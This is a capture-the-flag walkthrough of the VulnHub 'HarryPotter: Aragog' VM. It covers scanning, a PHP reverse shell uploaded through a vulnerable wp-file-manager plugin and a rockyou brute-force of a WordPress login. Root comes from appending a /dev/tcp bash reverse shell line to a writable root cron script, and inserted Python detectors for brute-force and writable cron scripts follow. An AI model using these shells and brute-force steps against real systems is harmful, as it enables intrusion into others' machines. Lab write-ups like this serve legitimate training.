HarryPotter: Aragog

Description


Aragog is the first VM of the three-box HarryPotter series. You need to find the 2 horcruxes hidden inside this machine (8 horcruxes in total are hidden across the 3 VMs of the series) and ultimately defeat Voldemort.

This is part 1 of the 3 VMs submitted on Vulnhub, so let's get started:

First of all, let's find the IP of the machine so that I can move on to service enumeration.

┌──(root💀N4TR0)-[/home/s4t0sh/]
└─# netdiscover -i vboxnet1
Currently scanning: 192.168.20.0/16 | Screen View: Unique Hosts
2 Captured ARP Req/Rep packets, from 2 hosts. Total size: 102
____________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.1.1 08:00:27:f3:04:f7 1 42 PCS Systemtechnik GmbH
192.168.1.101 08:00:27:30:fb:c8 1 60 PCS Systemtechnik GmbH

Service Scan:

Now let's enumerate the services running on the VM to proceed further.

┌──(root💀N4TR0)-[/home/s4t0sh/]
└─# nmap -v -sT -sC -p- -A 192.168.1.101
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 15:59 IST
..............
Nmap scan report for 192.168.1.101
Host is up (0.00045s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 48:df:48:37:25:94:c4:74:6b:2c:62:73:bf:b4:9f:a9 (RSA)
| 256 1e:34:18:17:5e:17:95:8f:70:2f:80:a6:d5:b4:17:3e (ECDSA)
|_ 256 3e:79:5f:55:55:3b:12:75:96:b4:3e:e3:83:7a:54:94 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:30:FB:C8 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Uptime guess: 41.396 days (since Thu Mar 25 06:29:32 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Only two services are running on it. Looking for known exploits for these service versions turned up nothing; maybe that's just my bad luck.

http://192.168.1.101/ 

Browsing to the IP returned nothing but a single image.

With nothing else to go on, the tool “dirb” may help.

┌──(s4t0sh㉿N4TR0)-[~]
└─$ dirb http://192.168.1.101

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed May 5 16:16:20 2021
URL_BASE: http://192.168.1.101/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.101/ ----
==> DIRECTORY: http://192.168.1.101/blog/
+ http://192.168.1.101/index.html (CODE:200|SIZE:97)
==> DIRECTORY: http://192.168.1.101/javascript/
+ http://192.168.1.101/server-status (CODE:403|SIZE:278)

---- Entering directory: http://192.168.1.101/blog/ ----
+ http://192.168.1.101/blog/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.1.101/blog/wp-admin/
==> DIRECTORY: http://192.168.1.101/blog/wp-content/
==> DIRECTORY: http://192.168.1.101/blog/wp-includes/
+ http://192.168.1.101/blog/xmlrpc.php (CODE:405|SIZE:42)

WordPress is running on the machine in another directory named “blog”, so I switched to the browser without wasting any time.

http://192.168.1.101/blog/wp-admin

I fired the wpscan tool on this to get more details.

┌──(root💀N4TR0)-[/home/s4t0sh/]
└─# wpscan --url http://192.168.1.101/blog/ -e ap --plugins-detection aggressive
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.10
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart


[i] Plugin(s) Identified:

[+] akismet
| Location: http://192.168.1.101/blog/wp-content/plugins/akismet/
| Latest Version: 4.1.9
| Last Updated: 2021-03-02T18:10:00.000Z
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.1.101/blog/wp-content/plugins/akismet/, status: 500
|
| The version could not be determined.

[+] wp-file-manager
| Location: http://192.168.1.101/blog/wp-content/plugins/wp-file-manager/
| Last Updated: 2021-03-30T06:37:00.000Z
| Readme: http://192.168.1.101/blog/wp-content/plugins/wp-file-manager/readme.txt
| [!] The version is out of date, the latest version is 7.1.1
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.1.101/blog/wp-content/plugins/wp-file-manager/, status: 200
|
| Version: 6.0 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.1.101/blog/wp-content/plugins/wp-file-manager/readme.txt

So I have a vulnerable plugin (wp-file-manager 6.0). I checked for an exploit and found one.

I uploaded my PHP reverse shell file.

Since the path of the uploaded file is displayed once the upload completes, I fired up a listener to catch the shell.

http://192.168.1.101/blog/wp-content/plugins/wp-file-manager/lib/files/install.php

And here I got it. Enumerating further, I found the first flag of the series, which is base64 encoded.

horcrux_{MTogUmlkRGxFJ3MgRGlBcnkgZEVzdHJvWWVkIEJ5IGhhUnJ5IGluIGNoYU1iRXIgb2YgU2VDcmV0cw==}

Checking the /home directory, I found two users named “ginny” and “hagrid98”, so I tried both as WordPress usernames and found that “hagrid98” is a WordPress user. To get the password I brute-forced it.

┌──(root💀N4TR0)-[/home/s4t0sh/Downloads]
└─# wpscan --url http://192.168.1.101/blog/ -U hagrid98 -P /usr/share/wordlists/rockyou.txt -t 10
_________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.10
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________


[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - hagrid98 / password123
Trying hagrid98 / password123 Time: 00:00:17 < > (1390 / 14345782) 0.00% ETA: ??:??:??

hagrid98 : password123
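Seen from the defender's side, a wpscan password attack like the one above is loud in the web server's access log: a burst of POSTs to wp-login.php from one address. The following Python is an added example, not code from the original post, that flags such bursts over constructed Apache combined-format lines; the user-agent string and the convention that WordPress answers a failed login with 200 and a successful one with a 302 redirect are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache combined log format; the constructed sample lines below mimic the wpscan run above.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)'
                    r' [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def find_wp_login_bruteforce(lines, login_path="/blog/wp-login.php", threshold=10, window_s=60):
    """Return {ip: summary} for IPs that POST to the login page >= threshold times within
    window_s seconds. Assumes WordPress answers a failed login with 200 (form re-rendered)
    and a successful one with a 302 redirect, so a 302 after a burst of 200s is a likely hit."""
    posts = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if m and m["method"] == "POST" and m["path"] == login_path:
            posts[m["ip"]].append((datetime.strptime(m["ts"], TS_FMT), int(m["status"]), m["ua"]))
    alerts = {}
    for ip, evs in posts.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):  # sliding window over timestamps
            while (evs[end][0] - evs[start][0]).total_seconds() > window_s:
                start += 1
            if end - start + 1 >= threshold:
                alerts[ip] = {
                    "attempts": len(evs),
                    "failed": sum(1 for _, st, _ in evs if st == 200),
                    "likely_success": any(st == 302 for _, st, _ in evs),
                    "user_agents": sorted({ua for _, _, ua in evs}),
                }
                break
    return alerts

# Constructed sample: 14 failed attempts in 26 s, then a success, plus one unrelated normal login.
UA = "WPScan v3.8.10 (https://wpscan.org/)"
SAMPLE = [f'192.168.1.1 - - [05/May/2021:16:40:{s:02d} +0530] "POST /blog/wp-login.php HTTP/1.1" '
          f'200 4311 "-" "{UA}"' for s in range(0, 28, 2)] + [
    f'192.168.1.1 - - [05/May/2021:16:40:29 +0530] "POST /blog/wp-login.php HTTP/1.1" 302 0 "-" "{UA}"',
    '192.168.1.50 - - [05/May/2021:16:41:02 +0530] "POST /blog/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, info in find_wp_login_bruteforce(SAMPLE).items():
        print(ip, info)
```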

I switched to the user hagrid98 and enumerated further but got nothing, so I looked at the cron jobs running on the machine.

I used a tool named “pspy” to monitor process activity and found that a script named “.backup.sh” in the “/opt” directory is run as root approximately every 2 minutes.

./pspy64 -p

Without wasting much time, I used the writable .backup.sh file to get a root shell: I appended a reverse shell line to it and started a listener to catch the shell.

hagrid98@Aragog:/opt$ echo "bash -i >& /dev/tcp/192.168.1.1/1212 0>&1 " >> .backup.sh
hagrid98@Aragog:/opt$ cat .backup.sh
#!/bin/bash

cp -r /usr/share/wordpress/wp-content/uploads/ /tmp/tmp_wp_uploads
bash -i >& /dev/tcp/192.168.1.1/1212 0>&1

root@Aragog:~# cat horcrux2.txt
____ _ _ _ _
/ ___|___ _ __ __ _ _ __ __ _| |_ _ _| | __ _| |_(_) ___ _ __ ___
| | / _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \/ __|
| |__| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | \__ \
\____\___/|_| |_|\__, |_| \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|___/
|___/


Machine Author: Mansoor R (@time4ster)
Machine Difficulty: Easy
Machine Name: Aragog
Horcruxes Hidden in this VM: 2 horcruxes

You have successfully pwned Aragog machine.
Here is your second hocrux: horcrux_{MjogbWFSdm9MbyBHYVVudCdzIHJpTmcgZGVTdHJPeWVkIGJZIERVbWJsZWRPcmU=}

And with that I have root privileges on the machine.
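The root cause of this privilege escalation is a root cron job that executes a script a low-privilege user can write to. The following Python is an added example, not the author's or the VM's code, that parses /etc/crontab-style entries and reports scripts with group/world-write bits or an owner that differs from the user the job runs as; the crontab text and the two scripts are constructed in a temporary directory, and the path heuristic (first absolute path in the command) is an assumption.

```python
import os
import pwd
import re
import stat
import tempfile

def parse_system_crontab(text):
    """Yield (user, command) from /etc/crontab-style lines (5 time fields or @spec, user, command)."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue  # blank, comment or VAR=value line
        parts = line.split(None, 2) if line.startswith("@") else line.split(None, 6)
        if len(parts) == (3 if line.startswith("@") else 7):
            yield parts[-2], parts[-1]

def audit_script(path, run_as_uid):
    """Reasons a cron-run script could be modified by someone other than the user it runs as."""
    st = os.stat(path)
    findings = []
    if st.st_mode & stat.S_IWGRP:
        findings.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        findings.append("world-writable")
    if st.st_uid != run_as_uid:
        findings.append(f"owned by uid {st.st_uid} but runs as uid {run_as_uid}")
    return findings

def audit_crontab(text, uid_of=lambda user: pwd.getpwnam(user).pw_uid):
    """{script_path: findings} for the first absolute path in each cron command (heuristic)."""
    report = {}
    for user, cmd in parse_system_crontab(text):
        m = re.search(r"(?<!\S)/\S+", cmd)  # skip things like '>/dev/null'
        if m:
            report[m.group()] = audit_script(m.group(), uid_of(user))
    return report

def demo(uid_of=lambda user: os.getuid()):
    """Constructed scenario: a mode-777 backup script next to a sane 755 one in a temp dir;
    uid_of maps 'root' to the current uid so the ownership check behaves the same unprivileged."""
    with tempfile.TemporaryDirectory() as d:
        bad, good = os.path.join(d, ".backup.sh"), os.path.join(d, "rotate.sh")
        for path, mode in ((bad, 0o777), (good, 0o755)):
            with open(path, "w") as f:
                f.write("#!/bin/bash\ncp -r /usr/share/wordpress/wp-content/uploads/ /tmp/tmp_wp_uploads\n")
            os.chmod(path, mode)
        crontab = f"SHELL=/bin/bash\n*/2 * * * * root {bad}\n@daily root bash {good} >/dev/null\n"
        return audit_crontab(crontab, uid_of)
```

Run against the real /etc/crontab and /etc/cron.d/* on a host, any script with a non-empty finding is one a cron user's peers could turn into exactly the shell shown above.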

I enjoyed and learned a lot from this VM; thanks to its author.

Hope you like it. For any query DM me.

❤❤HAPPY HACKING❤❤
